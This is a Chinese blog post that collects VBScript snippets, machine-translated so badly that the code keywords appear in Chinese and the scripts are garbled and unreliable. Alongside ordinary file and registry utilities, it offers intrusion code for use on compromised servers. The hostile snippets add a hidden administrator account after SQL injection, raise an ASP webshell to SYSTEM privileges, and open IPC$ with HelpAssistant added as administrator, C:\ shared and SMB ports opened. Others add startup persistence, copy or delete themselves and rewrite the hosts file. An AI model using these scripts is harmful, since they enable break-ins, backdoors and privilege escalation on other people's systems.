VBS脚本常用经典代码收集
在网上查找资料的时候发现好多经典的VBS代码,收集起来也为了以后学习。
VBS脚本用途很多:
1。计算
2。处理文件和文 件夹
3。管理视窗
4。处理的Word,Excel中时,PowerPoint等办公文档
。嵌入网页,驱动DHTML
6。编写HTTP通信
7。调用系统功能(COM组件),比如说语音说话
8。分析HTML,XML
9。调用命令行并分析返回结果
10。处理图片
11。自动化按键
12。调用Windows媒体播放器并管理
13。调用Windows Live Messenger的并管理
14。服务端技术:活动服务器页面(ASP)
15。脚本病毒
16。处理数据库
下面是我收集的VBS代码,大部分转自gangzi.org,以后还会更新。
VBS获取系统安装路径
先定义这个变量是获取系统安装路径的,然后我们用”&strWinDir&”调用这个变量。
设置使用WshShell = WScript.CreateObject用来(“执行”)strWinDir = WshShell.ExpandEnvironmentStrings(“%WINDIR%”)
VBS获取C:\ Program Files文件路径
MSGBOX的CreateObject(“WScript.Shell的”)。ExpandEnvironmentStrings来(“%PROGRAMFILES%”)
VBS获取C:\ Program Files文件\ Common Files文件路径
MSGBOX的CreateObject(“WScript.Shell的”)。ExpandEnvironmentStrings来(“%COMMONPROGRAMFILES%”)
给桌面添加网址快捷方式
集杠子= WScript.CreateObject用来(“执行”)strDesktop = gangzi.SpecialFolders(“桌面”)集oShellLink = gangzi.CreateShortcut(strDesktop&“\互联网Explorer.lnk”)oShellLink.TargetPath =“http://www 。fendou.info“oShellLink.Description =”Internet Explorer“的oShellLink.IconLocation =”%PROGRAMFILES%\的Internet Explorer \ IEXPLORE.EXE,0“oShellLink.Save
给收藏夹添加网址
常量ADMINISTRATIVE_TOOLS = 6设置objShell =的CreateObject(“好Shell.Application”)设置objFolder就= objShell.Namespace(ADMINISTRATIVE_TOOLS)设置objFolderItem = objFolder.Self设置objShell = WScript.CreateObject用来(“WScript.Shell的”)strDesktopFld = objFolderItem.Path设置objURLShortcut = objShell.CreateShortcut(strDesktopFld&“\奋斗Blog.url”)objURLShortcut.TargetPath =的“http://www.fendou.info/”objURLShortcut.Save
删除指定目录指定后缀文件
在错误恢复下一步设置FSO =的CreateObject(“Scripting.FileSystemObject的”)fso.DeleteFile“C:\ *。vbs的”,真正的设置FSO =没有
VBS改主页
设置oShell =的CreateObject(“执行”)oShell.RegWrite“HKEY_CURRENT_USER \软件\微软\的Internet Explorer \主\起始页”,“http://www.fendou.info”
VBS加启动项
的CreateObject(的“WSCRIPT.SHELL”)设置oShell = oShell.RegWrite“HKLM \软件\微软\ WINDOWS \ CURRENTVERSION \执行\ CMD”,“cmd.exe的”
VBS复制自己
集COPY1 = CREATEOBJECT(“Scripting.FileSystemObject的”)copy1.getfile(wscript.scriptfullname)。副本(“C:\ huan.vbs”)
复制自己到Ç盘的huan.vbs(复制本vbs的目录下的的Game.exe文件到Ç盘的gangzi.exe)
副本(“C:\ gangzi.exe”)集COPY1 = CREATEOBJECT(“Scripting.FileSystemObject的”)copy1.getfile(“的Game.exe”)。
VBS获取系统临时目录
设置暗淡FSO FSO =的CreateObject(“Scripting.FileSystemObject的”)整体暗淡tempfolder常量TemporaryFolder = 2设置tempfolder的fso.GetSpecialFolder(TemporaryFolder)Wscript.Echo tempfolder
就算代码出错依然继续执行
在错误恢复下一步
VBS打开网址
设置objShell =的CreateObject(的“WSCRIPT.SHELL”)objShell.Run(的“http://www.fendou.info/”)
VBS发送邮件
命名空间=的“http://schemas.microsoft.com/cdo/configuration/”设置电子邮件=的CreateObject(“CDO.Message的”)Email.From =“发件@ qq.com”Email.To =“收件@ QQ 。com“Email.Subject =”测试sendmail.vbs“Email.Textbody =”OK!“ Email.AddAttachment“C:\ 1.txt中”随着Email.Configuration.Fields的。项目(命名空间&“sendusing”)= 2项目(命名空间“smtpserver”)=“SMTP邮件服务器。com”项目(命名空间“smtpserverport “= 25)。项目(命名空间&”smtpauthenticate“)= 1。项目(命名空间”sendusername“)=”发件人用户名“项目(命名空间&”sendpassword“)=”发件人密码“,更新结束电子邮件发送。
VBS结束进程
请将strComputer =“。” 设置了objWMIService = GETOBJECT _(“winmgmts:\ \”&strComputer的&“\ ROOT \ CIMV2”)colProcessList中= objWMIService.ExecQuery _(“SELECT * FROM Win32_Process的名称='RAR.EXE'”)每个objProcess的colProcessList中objProcess.Terminate()接下来
VBS隐藏打开网址(部分浏览器无法隐藏打开,而是直接打开,适合主流用户使用)
(“WScript.Shell的”)。运行“的IEXPLORE http://www.fendou.info/”,0
文件路径,应该比上面的方法好,但是两种方法都不是绝对的。
设置objws = WScript.CreateObject用来(“执行”)objws.Run“”C:\ Program Files文件\的Internet Explorer \ IEXPLORE.EXE“www.baidu.com”,vbhide
VBS遍历硬盘删除指定文件名
在错误恢复下一步的暗淡fPath strComputer的=“。” 设置了objWMIService = GETOBJECT _(“winmgmts:\ \”&strComputer的&“\ ROOT \ CIMV2”)设置colProcessList中= objWMIService.ExecQuery _(“SELECT * FROM Win32_Process的名称='gangzi.exe'”)对于每个objProcess在colProcessList中objProcess.Terminate()下一集了objWMIService = GetObject的(“winmgmts:”_&“{impersonationLevel =冒充}!\ \”&strComputer的&“\ ROOT \ CIMV2”)的设置colDirs =了objWMIService。_的ExecQuery(“SELECT * FROM Win32_Directory名称LIKE'%C:%'或名称LIKE'%D:%'LIKE'%E:%'或名称或名称LIKE'%F:%'或名称LIKE'%G :%'或名称LIKE'%H:%'或名称LIKE'%I:%'“)设置objFSO =的CreateObject(”Scripting.FileSystemObject的“)对于每个OBJDIR在colDirs fPath objDir.Name&”\ gangzi.exe的“objFSO.DeleteFile(fPath),真下一页VBS获取网卡MAC地址
昏暗的MC,如果mo.IPEnabled莫集MC = GETOBJECT(“Winmgmts:”)。InstancesOf(“Win32_NetworkAdapterConfiguration的”)为每个谟在MC = true,则MsgBox的“本机网卡的MAC地址是:”&mo.MacAddress退出结束如果下一步
VBS获取本机注册表主页地址
设置REG = WScript.CreateObject用来(“执行”)起始页= reg.RegRead(“HKEY_CURRENT_USER \软件\微软\的Internet Explorer \主\”开始页“)MsgBox的起始页
VBS遍历所有磁盘的所有目录,找到所有.txt的文件,然后给所有txt文件最底部加一句话
在错误恢复下一步设置FSO =的CreateObject(“Scripting.FileSystemObject的”)CO = VbCrLf“路过。”对于每一个我在fso.Drives如果i.DriveType = 2 GF fso.GetFolder(I&“\”)如果下一页子GF(散)瓦FOL暗淡i对于每个fol.SubFolders我在结束GF接下来我结束子子WH(散)点心i对于每个I fol.Files,LCASE如果(fso.GetExtensionName(I))=“ shtml的“,然后fso.OpenTextFile(I,8,0)。写合作结束如果下一页尾子
获取计算机所有盘符
设置FSO =的CreateObject(“Scripting.FileSystemObject的”)设置objdrives = fso.Drives'取得当前计算机的所有磁盘驱动器对于每个objdrive中在objdrives'遍历磁盘MsgBox的objdrive下一页
VBS给本机所有磁盘根目录创建文件
在错误恢复下一步设置FSO =的CreateObject(“Scripting.FileSystemObject的”)设置gangzis = fso.Drives'取得当前计算机的所有磁盘驱动器对于每个杠子在gangzis'遍历磁盘设置TESTFILE = fso.CreateTextFile(“杠子&”\新建vbs的文件夹。“TURE)TestFile.WriteLine(通过www.gangzi.org”)TestFile.Close下一步
VBS遍历本机全盘找到所有123.exe,然后给他们改名321.exe
设置FS =的CreateObject(“Scripting.FileSystemObject的”)在fs.drives fstraversal drive.rootfolder下一子fstraversal(BYVAL这个)this.subfolders fstraversal文件夹中的每个文件夹中为每个驱动器下集文件中每个文件的文件this.files如果file.name =“123.exe”,然后file.name =“321.exe”高端子
VBS写入代码到粘贴板(先说明一下,VBS写内容到粘贴板,网上千篇一律都是通过InternetExplorer.Application对象来实现,但是缺点是在默认浏览器为非IE中会弹出浏览器,所以费了很大的劲找到了这个代码来实现)
海峡=“这里是你要复制到剪贴板的字符串”设置WS = WScript.CreateObject用来(“WScript.Shell的)ws.run的”MSHTA vbscript的:clipboardData.SetData(“+”“+”文字“+ “”“”+“,”+“”“”&str的“”“”+“)(接近)”,0,真
QQ自动发消息
在错误恢复下一步STR =“我是笨蛋/ QQ”设置使用WshShell = WScript.CreateObject用来(“WScript.Shell的”)的WshShell.run“的MSHTA VBScript:clipboardData.SetData(”+“”+“文字”+“” “”+“,”+“”,“”&str的“”“”+“)(接近)”,0 WshShell.run WScript.Sleep 3000 WshShell.SendKeys“^ V”WshShell.SendKeys“%”
VBS隐藏文件
设置objFSO =的CreateObject(“Scripting.FileSystemObject的”)设置OBJFILE = objFSO.GetFile(“F:\软件大赛\ show.txt”)如果objFile.Attributes的objFile.Attributes和2那么objFile.Attributes =家objFile.Attributes XOR 2如果结束
VBS生成随机数(521是生成规则,不同的数字生成的规则不一样,可以用于其它用途)
随机521点=阵列(INT(100 * RND +1),智力(1000 * RND +1),INT(10000 * RND +1))msgbox的加入(点,“”)
VBS删除桌面IE图标(非快捷方式)
设置oShell =的CreateObject(“执行”)oShell.RegWrite“HKCU \软件\微软\ WINDOWS \ CURRENTVERSION \政策\浏览器\ NoInternetIcon”,1,“REG_DWORD”
VBS获取自身文件名
FSO =的CreateObject(“Scripting.FileSystemObject的”)MSGBOX WScript.ScriptName的
VBS读取的Unicode编码的文件
objFSO =的CreateObject(“Scripting.FileSystemObject的”)设置OBJFILE = objFSO.OpenTextFile(“gangzi.txt”,1,假,-1)strText中= objFile.ReadAll objFile.Close Wscript.Echo strText中
VBS读取指定编码的文件(默认为UFT-8)杠子变量是要读取文件的路径
设置STM2 =(“ADODB.Stream”)stm2.Charset =“UTF-8”stm2.Open stm2.LoadFromFile杠子用readfile = stm2.ReadText的MsgBox用readfile
VBS禁用组策略
设置oShell =的CreateObject(“执行”)oShell.RegWrite“HKEY_CURRENT_USER \软件\政策\微软\ MMC \ RestrictToPermittedSnapins”,1,“REG_DWORD”
VBS写指定编码的文件(默认为uft-8)gangzi变量是要读取文件的路径,gangzi2是内容变量
杠子=“1.txt的”gangzi2 =“www.gangzi.org的设置STM1 =的CreateObject(”ADODB.Stream“)Stm1.Type = 2 Stm1.Open Stm1.Charset =”UTF-8“Stm1.Position = STM1。大小Stm1.WriteText gangzi2 Stm1.SaveToFile杠子,2 Stm1.Close集STM1 =无关
VBS获取当前目录下所有文件夹名字(不包括子文件夹)
设置FSO =的CreateObject(“Scripting.FileSystemObject的”)设置F = fso.GetFolder(fso.GetAbsolutePathName(“。”))设置文件夹对于每个FO = f.SubFolders在文件夹wsh.echo fo.Name下设置文件夹=无设置F =无关集FSO =无关
VBS获取指定目录下所有文件夹名字(包括子文件夹)
昏暗的吨设置FSO = WScript.CreateObject用来(“Scripting.FileSystemObject的”)组FS = fso.GetFolder(“D:\”):WScript.Echo AA(FS)功能AA(n)为F = n.subfolders对于每个UU F设置OP = fso.GetFolder(uu.path)T = T&vbcrlf&op.path呼叫AA(OP)下一页AA = T端功能
VBS创建.URL文件(IconIndex参数不同的数字代表不同的图标,具体请参照SHELL32.dll里面的所有图标)
设置FSO = CREATEOBJECT(“Scripting.FileSystemObject的”)启东启东“[InternetShortcut]”CHR(13)&CHR(10)启东启东“URL = http://www.fendou.info”&CHR(13)CHR(10 qq.url“TURE)TestFile.WriteLine(启东)TestFile.Close
VBS写主机(没写判断,无论存不存在都追加底部)
设置FS =的CreateObject(“Scripting.FileSystemObject的”)=“&fs.GetSpecialFolder(1)&”\驱动程序\等\主机“设置路径F = fs.OpenTextFile(路径,8,TristateFalse)f.Write”“&vbcrlf&” 127.0.0.1 www.g.cn“&vbcrlf&”127.0.0.1 g.cn“发生异常时,
VBS读取出HKEY_LOCAL_MACHINE \ SOFTWARE \微软\ WINDOWS \ CURRENTVERSION \资源管理器\桌面\命名空间下面所有键的名字并循环输出
常量HKLM =&H80000002 strPath中=“软件\微软\ WINDOWS \ CURRENTVERSION \浏览器\桌面\命名空间”设置OREG = GETOBJECT(“Winmgmts:\根\默认:StdRegProv”)HKLM oreg.EnumKey,strPath中,编曲每个X到达旁边的X WScript.Echo
VBS创建TXT文件
暗淡TESTFILE设置FSO,FSO =的CreateObject(“Scripting.FileSystemObject的”)设置TESTFILE = fso.CreateTextFile(“C:\ hello.txt的”TURE)TestFile.WriteLine(“你好,世界!”)TestFile.Close
VBS创建文件夹
昏暗的FSO,FLD设定FSO =的CreateObject(“Scripting.FileSystemObject的”)设置FLD = fso.CreateFolder(“C:\新建文件夹”)
VBS判断文件夹是否存在
暗淡FSO,FLD设定FSO =的CreateObject(“Scripting.FileSystemObject的”)如果(fso.FolderExists(“C:\新建文件夹”)),然后用msgbox(“文件夹存在。”),否则设置FLD = fso.CreateFolder(“C:\新建文件夹“)结束如果
VBS使用变量判断文件夹
暗淡FSO,FLD drvName =“C:\”fldName =“新建文件夹”设置FSO =的CreateObject(“Scripting.FileSystemObject的”)(fso.FolderExists(drvName fldName))如果MSGBOX(“文件夹存在。”),否则设置FLD = FSO 。CreateFolder的(drvName&fldName)的结束如果
VBS加输入框
暗淡FSO,TESTFILE,文件名,drvName fldName drvName的输入框(“输入驱动器保存到:”,“驱动器字母”)fldName = InputBox(“请输入文件夹名称”,“文件夹名称”)的文件名=输入框( “输入的文件名”,“文件名”)设置FSO =的CreateObject(“Scripting.FileSystemObject的”)(fso.FolderExists(drvName fldName))如果MSGBOX(“文件夹”),否则设置FLD = fso.CreateFolder( drvName&fldName)的结束如果设置TESTFILE = fso.CreateTextFile(drvName&fldName&“\”文件名“TXT”,TRUE)TestFile.WriteLine(“你好,世界!”)TestFile.Close
VBS检查是否有相同文件
暗淡FSO,TESTFILE,文件名,drvName fldName drvName的输入框(“输入驱动器保存到:”,“驱动器字母”)fldName = InputBox(“请输入文件夹名称”,“文件夹名称”)的文件名=输入框( “输入的文件名”,“文件名”)设置FSO =的CreateObject(“Scripting.FileSystemObject的”)(fso.FolderExists(drvName fldName))如果MSGBOX(“文件夹”),否则设置FLD = fso.CreateFolder( drvName&fldName)结束如果如果(fso.FileExists(drvName&fldName&“\”&文件名&“。TXT”))MSGBOX(“文件已经存在。”),否则设置TESTFILE = fso.CreateTextFile(drvName&fldName&“\”&文件名&“。TXT”,真如果)TestFile.WriteLine(“你好,世界!”)TestFile.Close结束
VBS改写,追加文件
暗淡FSO,打开文件设置FSO =的CreateObject(“Scripting.FileSystemObject的”)设置打开文件= fso.OpenTextFile(“C:\ test.txt的”,2,真)'1表示只读,2表示可写,8表示追加打开文件写的“Hello World!” openFile.Close
VBS读取文件读取全部读取全部
暗淡FSO,打开文件集FSO =的CreateObject(“Scripting.FileSystemObject的”)设置打开文件= fso.OpenTextFile(“C:\ test.txt的”,1,TRUE)MsgBox的(openFile.ReadAll)
VBS读取文件的ReadLine读取一行
昏暗的FSO,打开文件集FSO =的CreateObject(“Scripting.FileSystemObject的”)设置打开文件= fso.OpenTextFile(“C:\ test.txt的”,1,TRUE)MsgBox的(openFile.ReadLine())MsgBox的(openFile.ReadLine() )'如果读取行数超过文件的行数,就会出错
VBS读取文件读取读取Ñ个字符
打开文件设置FSO =的CreateObject(“Scripting.FileSystemObject的”)设置打开文件= fso.OpenTextFile(“C:\ test.txt的”,1,TRUE)MSGBOX(openFile.Read(2))'如果超出了字符数之Dim fso, ,不会出错。
VBS删除文件
暗淡FSO设置FSO =的CreateObject(“Scripting.FileSystemObject的”)fso.DeleteFile(“C:\ test.txt的”)
VBS删除文件夹
昏暗的FSO设置FSO =的CreateObject(“Scripting.FileSystemObject的”)fso.DeleteFolder(“C:\新建文件夹”)“借着有文件夹中有没有文件都一并删除
VBS连续创建文件
暗淡FSO,FSO = TESTFILE设置的CreateObject(“Scripting.FileSystemObject的”)对于i = 1至10集TESTFILE = fso.CreateTextFile(“C:\你好”&I&“TXT”,TURE)TestFile.WriteLine(“你好,世界!“)TestFile.Close往下
VBS根据计算机名随机生成字符串
一套WS = CREATEOBJECT(“WScript.Shell的”)集wenv = ws.environment(“进程”)RDA = wenv(“计算机”)的功能UCharRand(N)对于i = 1到n随机ASC(MID(RDA,1, 1))TEMP = CINT(25 * RND)温度=温度+65 UCharRand = UCharRand CHR(临时)下一页尾功能MSGBOX UCharRand(LEN(RDA))
VBS根据MAC生成序列号
功能编码(strPass)昏暗的我,theStr strTmp对于i = 1到LEN(strPass)的strTmp = ASC(MID(strPass,I,1))theStr = theStr ABS(strTmp),的下一页strPass的= theStr theStr =“”虽然LEN(strPass)> 16 strPass = JoinCutStr环路(strPass)对于I = 1到LEN(strPass)的strTmp = CINT(MID(strPass,I,1))strTmp = IIF(strTmp> 6,CHR(strTmp + 60) strTmp)theStr = theStr,strTmp下一页编码= theStr端功能功能JoinCutStr(STR)点心,theStr对于i = 1到LEN(STR)如果len(STR) - I = 0,然后退出对于theStr = theStr CHR( CINT((ASC(MID(STR,I,1))+ ASC(MID(STR,我+1,1)))/ 2)),I = I + 1下一页JoinCutStr = theStr端功能函数IIF(VAR,VAL1 ,值2)如果var =真IIF = VAL1否则IIF = val2的结束,如果结束功能设置如果mo.IPEnabled MC = GETOBJECT(“Winmgmts:”):。InstancesOf(“Win32_NetworkAdapterConfiguration的”)为每个谟在MC = true,那么theStr = mo.MacAddress退出结束,如果下一个随机编码(theStr)rdnum = INT(10 * RND +5)功能allRand(N)对于i = 1到n的随机编码(theStr)温度= CINT(25 * RND)如果温度模2 = 0,那么温度=温度+ 97 ELSEIF温度<9温度=温度+ 48否则温度=温度+ 65结束,如果allRand = allRand CHR(临时)下一页尾的功能:MSGBOX allRand(rdnum)
VBS自动连接ADSL
昏暗的WSH设置WSH = WScript.CreateObject用来wsh.run“RASDIAL连接名字账号密码”,假(“执行”),1
VBS自动断开ADSL
昏暗的WSH设置WSH = WScript.CreateObject用来(“WScript.Shell的)wsh.run”RASDIAL /断开“,假的,1
VBS每隔3秒自动更换IP并打开网址实例(值得一提的是,下面这个代码中每次打开的网址都是引用同一个IE窗口,也就是每次打开的是覆盖上次打开的窗口,如果需要每次打开的网址都是新窗口,直接使用run就可以了)
昏暗的WSH设置WSH = WScript.CreateObject用来(“WScript.Shell的)设置OIE =的CreateObject(”InternetExplorer.Application“)对于i = 1至5 wsh.run”RASDIAL /断开“,假,1 wsh.run”RASDIAL连接名字账号密码“,假的,1 oIE.Navigate”http://www.ip138.com/?“&I&”呼叫SynchronizeIE的oIE.Visible =真正的下一子SynchronizeIE的错误时恢复下一步虽然(oIE.Busy)WScript的。睡眠循环结束小组3000
用VBS来加管理员帐号
在注入过程中明明有了sa帐号,但是由于net.exe和net1.exe被限制,或其它的不明原因,总是加不了管理员帐号。VBS在活动目录(adsi)部份有一个winnt对像,可以用来管理本地资源,可以用它不依靠cmd等命令来加一个管理员,详细代码如下:
集wsnetwork =的CreateObject(的“WSCRIPT.NETWORK”)OS =“WINNT :/ /”&wsnetwork.ComputerName设置OB = GETOBJECT(OS)'得到ADSI接口,绑定设置OE = GETOBJECT(OS&“/管理员,组”)“属性,管理员组设置OD = ob.Create(“用户名”,“LCX”的)'建立用户od.SetPassword“123456”'设置密码od.SetInfo'保存设置= GETOBJECT(OS&“/ LCX”,用户)'得到用户oe.add OS&“/ LCX”
这段代码如果保存为1.vbs,在CMD下运行,格式:CSCRIPT
用vbs来列虚拟主机的物理目录
有时旁注入侵成功一个站,拿到系统权限后,面对上百个虚拟主机,怎样才能更快的找到我们目标站的物理目录呢?一个站一个站翻看太累,用系统自带的adsutil.vbs吧又感觉好像参数很多,有点无法下手的感觉,试试我这个脚本吧,代码如下:
ObjService =则GetObject(“IIS :/ / LocalHost/W3SVC的”)每obj3w objservice如果IsNumeric函数(obj3w.Name)然后sServerName的= Obj3w.ServerComment设置网站= GetObject的(“IIS :/ / LocalHost/W3SVC的的/”&obj3w名称“/根”)ListAllWeb = ListAllWeb obj3w.Name和字符串(25 LEN(obj3w.Name)的,“”)&obj3w.ServerComment的“(”&webSite.Path&“)”&vbCrLf分结束如果下一页WScript.Echo ListAllWeb设置ObjService =无WScript.Quit
运行CSCRIPT
组“域管理员”
设置OBJ =则GetObject(“LDAP :/ / rootDSE的”)wscript.echo obj.servername
只用这两句代码就足够了,运行CSCRIPT psexec.exe-U-P
WebShell提权用的VBS代码
asp木马一直是搞脚本的朋友喜欢使用的工具之一,但由于它的权限一般都比较低(一般是IWAM_NAME权限),所以大家想出了各种方法来提升它的权限,比如说通过asp木马得到mssql数据库的权限,或拿到ftp的密码信息,又或者说是替换一个服务程序。而我今天要介绍的技巧是利用一个vbs文件来提升asp木马的权限,代码如下asp木马一直是搞脚本的朋友喜欢使用的工具之一,但由于它的权限一般都比较低(一般是IWAM_NAME权限),所以大家想出了各种方法来提升它的权限,比如说通过asp木马得到mssql数据库的权限,或拿到ftp的密码信息,又或者说是替换一个服务程序。而我今天要介绍的技巧是利用一个vbs文件来提升asp木马的权限,代码如下:
集WSH = CREATEOBJECT(“执行”)'创建一个WSH对象= wsh.run(“cmd.exe的/ C CScript.exe的C:\ INETPUB \ AdminScripts \ adsutil.vbs的/ W3SVC/InProcessIsapiApps,C:\ WINNT \ SYSTEM32 \ INETSRV \ httpext.dll C:\ WINNT \ SYSTEM32 \ INETSRV \ httpodbc.dll C:\ WINNT \ SYSTEM32 \ INETSRV \ Ssinc.dll的C:\ WINNT \ SYSTEM32 \ msw3prt.dll的C:\ WINNT \ SYSTEM32 \ INETSRV \ asp.dll的“,0)'加入asp.dll的到InProcessIsapiApps中
将其保存为vbs的后缀,再上传到服务上,
然后利用asp木马执行这个vbs文件后。再试试你的asp木马吧,你会发现自己己经是system权限了
VBS开启IPC服务和相关设置
的暗淡OperationRegistry设置OperationRegistry = WScript.CreateObject用来(“WScript.Shell的)OperationRegistry.RegWrite”HKEY_LOCAL_MACHINE \ SYSTEM \ CURRENTCONTROLSET \控制\ LSA \ ForceGuest的“0设置wsh3 = WScript.CreateObject用来(”WScript.Shell的“)的wsh3.Run”用户HelpAssistant的净额123456“,0,虚假wsh3.Run”HelpAssistant的用户净额/主动“,0,假wsh3.Run的”HelpAssistant的净LOCALGROUP管理员/添加“,0,假wsh3.Run的”净开始的lanmanworkstation的/ Y“,0 ,虚假wsh3.Run的“净启动Lanmanserver / Y”,0,假wsh3.Run的“净启动IPC $”,0,真wsh3.Run“份额净值加元= C:\”,0,虚假wsh3.Run“ netsh防火墙设置通知禁用“,0,真wsh3.Run”netsh防火墙设置portopening TCP 139启用“,0,假wsh3.Run”netsh防火墙设置portopening UDP 139启用“,0,假wsh3.Run”netsh防火墙设置portopening TCP 445启用“,0,假wsh3.Run”netsh防火墙设置portopening UDP 445启用“,0,假
VBS时间判断代码
数字=小时=小时(数字)分钟=分钟(数字)秒=第二个(数字),如果(小时<6),然后DN =“凌辰了,还没睡啊?”结束(小时> = 6)然后DN =“早上好!”结束如果如果(小时> 12),然后DN =“下午好!”结束,如果如果(小时> 18),然后DN =“晚上好!”结束假如小时(> 22),然后跌=“不早了,夜深了,该睡觉了!”结束,如果(分钟<= 9)分钟=“0”分钟结束,如果如果(秒<= 9),然后秒=“0”秒结束如果CTIME =小时“:”分钟“:”&秒&“”&DN MSGBOX的ctime
VBS注册表读写
昏暗的OperationRegistry下,myNum的OperationRegistry设置= WScript.CreateObject用来(“执行”)将myNum = 9 = OperationRegistry.RegRead myNum的“HKEY_LOCAL_MACHINE \ SYSTEM \ CURRENTCONTROLSET \控制\ LSA \ ForceGuest的”MSGBOX(“=”ForceGuest的前将myNum)OperationRegistry 。的RegWrite“HKEY_LOCAL_MACHINE \ SYSTEM \ CURRENTCONTROLSET \控制\ LSA \ ForceGuest的”,0将myNum = OperationRegistry.RegRead(“HKEY_LOCAL_MACHINE \ SYSTEM \ CURRENTCONTROLSET \控制\ LSA \ ForceGuest的”)MsgBox的(“后ForceGuest的=”&myNum的)
VBS运行后删除自身代码
昏暗的设置FSO FSO,F =的CreateObject(“Scripting.FileSystemObject的”)F = fso.DeleteFile(WScript.ScriptName)WScript.Echo(WScript.ScriptName)
TAG:
标题搜索
日历
|
|||||||||
| 日 | 一 | 二 | 三 | 四 | 五 | 六 | |||
| 1 | 2 | 3 | 4 | ||||||
| 5 | 6 | 7 | 8 | 9 | 10 | 11 | |||
| 12 | 13 | 14 | 15 | 16 | 17 | 18 | |||
| 19 | 20 | 21 | 22 | 23 | 24 | 25 | |||
| 26 | 27 | 28 | 29 | 30 | 31 | ||||
我的存档
数据统计
- 访问量: 51861
- 日志数: 64
- 建立时间: 2012-04-10
- 更新时间: 2013-11-29
